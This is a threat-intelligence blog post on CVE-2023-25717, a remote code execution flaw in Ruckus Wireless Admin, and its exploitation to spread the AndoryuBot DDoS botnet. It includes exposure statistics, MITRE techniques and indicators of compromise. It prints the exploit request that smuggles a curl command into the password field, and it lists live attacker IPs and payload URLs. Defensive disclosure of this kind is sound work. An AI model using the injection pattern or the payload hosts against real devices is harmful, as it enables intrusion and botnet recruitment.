Ruckus Wireless Products in the Crosshairs
On February 8th, 2023, a vendor alerted customers regarding a security vulnerability in Ruckus Wireless Admin. CVE-2023-25717 is a critical vulnerability categorized as a Remote Code Execution (RCE) vulnerability impacting the Ruckus Wireless Admin.
This vulnerability stems from inadequate handling of a specially crafted HTTP request. As indicated by the NVD vulnerability description & publicly available POC, the vulnerability is exploited by sending the HTTP GET request –
“/forms/doLogin?login_username=admin&password=password$(curl substring)”
The Cyble Global Sensor Network (CGSI) observed active exploitation of CVE-2023-25717 and deployment of AndoryuBot, as shown in the image below. This incident indicates that Threat Actors (TAs) are actively looking for vulnerable Ruckus assets for exploitation purposes.
Since the Proof of Concept (POC) for the vulnerability is publicly available, we expect that Threat Actors (TAs) will exploit this vulnerability on a large scale. On May 8th, 2023, Fortinet released a blog stating, “AndoruyBot distributing through Ruckus Vulnerability”. Cybersecurity and Infrastructure Agency (CISA) added CVE-2023-25717 to their Known Exploited Vulnerability catalog on May 15th, 2023.
AndoryuBot is a new Botnet malware sold on Telegram on a subscription basis. The deployment of such malware by TAs allows them to orchestrate large-scale DDoS attacks, which can overwhelm targeted servers and infrastructure by flooding them with a massive volume of traffic.
Exposure of Ruckus Wireless Admin Panel
As the vulnerability falls under the critical severity category and is being used by AndoryuBot, Researchers at Cyble investigated one of the online scanners for internet-exposed Ruckus Wireless Admin panels. They found that there are ~52k instances exposed over the internet.
The figure below represents the geographical distribution of internet-exposed instances.
The graph below shows the Top 5 countries with the highest number of exposed assets.
AndoryuBot Analysis
The Continuous monitoring and logging can help in detecting network anomalies early.
MITRE ATT&CK® Techniques
| Tactic | Technique ID | Technique Name |
| Execution | T1059 | Command and Scripting Interpreter |
| Defense Evasion | T1140 T1480 T1036 |
Deobfuscate/Decode Files or Information Execution Guardrails Masquerading |
| Privilege Escalation | T1055 | Process Injection |
| Command and Control | T1095 | Non-Application Layer Protocol |
Indicators of Compromise (IoCs):
| Indicators | Indicator Type | Description |
| hxxp[:]//47.87.154.192/ hxxp[:]//47.87.154.192/Andoryu.m68k hxxp[:]//47.87.154.192/Andoryu.spc hxxp[:]//47.87.154.192/Andoryu.arm7 hxxps[:]//47.87.154.192/ hxxp[:]//47.87.154.192/gitlab hxxp[:]//47.87.154.192/Andoryu.i686 hxxp[:]//47.87.154.192/rt/ hxxp[:]//47.87.154.192/rt hxxp[:]//47.87.154.192/andoryu.arm5 hxxp[:]//47.87.154.192/Andoryu.arm6 hxxp[:]//47.87.154.192/Andoryu.mpsl/ hxxp[:]//47.87.154.192/Andoryu.arm hxxp[:]//47.87.154.192/Andoryu.x86 | URL | Malicious URL |
| d2ad2d8d1b7dac89f2fb977c6b2c36a9 86d630159a13b4a594e3eae23ccbda891a67f696 c4925a91ed853920d8acee79bf0bb9342da4dabc0a2970823027f39ede399bce |
MD5 SHA1 SHA256 |
AndorYuBot Binary |
| 163.123.142.146 | IP Address | Malicious IP dropping AndoroyuBot |
| 47.87.154.192 | IP Address | Malicious IP dropping AndoroyuBot |
Related
Source: https://blog.cyble.com/2023/05/17/andoryubots-ddos-rampage/